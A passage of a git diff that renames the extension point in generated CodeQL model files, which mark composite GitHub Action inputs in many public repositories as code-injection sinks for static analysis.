extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31dbf..680bbe27bcb4 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c0..ffe074d3dea9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54b..e53a58412c9e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c6..a899f727e395 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b7959812..0c7c2e1bded6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10f..3d631e60dc37 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3dc..2f8710d2cbd0 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da836..5490e62cdc91 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a07514..0c6df201a1c9 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf20..7d0b894f35d8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3bb..d85418c7a41e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e8..074cf066e373 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c46365..c4497b59af8e 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1a..cc28e15a55b0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e5..76fb41dadf10 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019e..b786a672140d 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d47..236ac8f2cd21 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9faf..64207dbca6ab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e83..46de0ff86c67 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b982257211..a07b223777b0 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb113..e3470982f53d 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab904..87535288d265 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1ad..28249c824287 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e9..8d1bbce631fc 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb35..3c5f85a6e79e 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec00..01a552361ecf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e4..ab2e86ce8681 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd6709..8d6dd73bfd91 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a59..a20cbb1e24da 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5e..62785bef86bf 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f6..9c10a54abc71 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f7..4145ec195690 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38d..5b63c9fec069 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebda..f21389b08b02 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc018791..1a6f42c25f66 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737f..ea48b84310cb 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453bd..4e953d695f82 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc6007..32040ef84eac 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1a..b258ea1ce2da 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53c..c0a51345ae6f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04d..f362cd1f72b7 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6dd..35474e6c68f9 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b340..ce961ee6a75b 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c3312262..9ad4bb306662 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c10..5fca46427e00 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d2..9f0fecbe10b9 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a013..cadf01dbff1e 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df670..ec4fc1da053c 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd1158..e6530a19d972 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + 